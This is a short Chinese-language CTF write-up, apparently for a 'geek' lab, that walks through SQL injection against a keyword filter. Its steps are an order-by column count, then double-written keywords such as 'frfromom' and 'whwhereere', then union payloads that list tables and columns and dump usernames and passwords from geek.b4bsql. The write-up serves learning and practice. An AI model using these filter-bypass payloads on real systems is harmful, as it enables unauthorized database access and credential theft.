进入靶场

order by 判断字节数

输入内容是 1' order by 2#

显示图片内容，知被过滤了

一般最简单的绕过方法是双写或大小写

尝试双写

It is ok

continue

经过多次尝试，4时异常，所以字节数是3

union select都被过滤了

双写解决，成功找到注入点

库名geek

又过滤了，继续双写

grogroup_concatup_concat(tatable_nameble_name) frfromom information_scinformation_schemahema.tables whwhereere table.schema='geek'#

继续改

grogroup_concatup_concat(tatable_nameble_name) frfromom infoorrmation_schema.tables whwhereere table.schema='geek'#

继续改

group_concat(tatable_nameble_name) frfromom infoorrmation_schema.tables whwhereere table.schema='geek'#

继续改

group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table.schema='geek'#

继续改

group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#

终于改出来了，热泪盈眶

continue

group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='geekuser'#

爆出字节内容

group_concat(id,username,password) frfromom geek.b4bsql#

继续改

group_concat(id,username,passwoorrd) frfromom geek.b4bsql#

great

笔记

1，考察双写注入，联合注入

2，不断尝试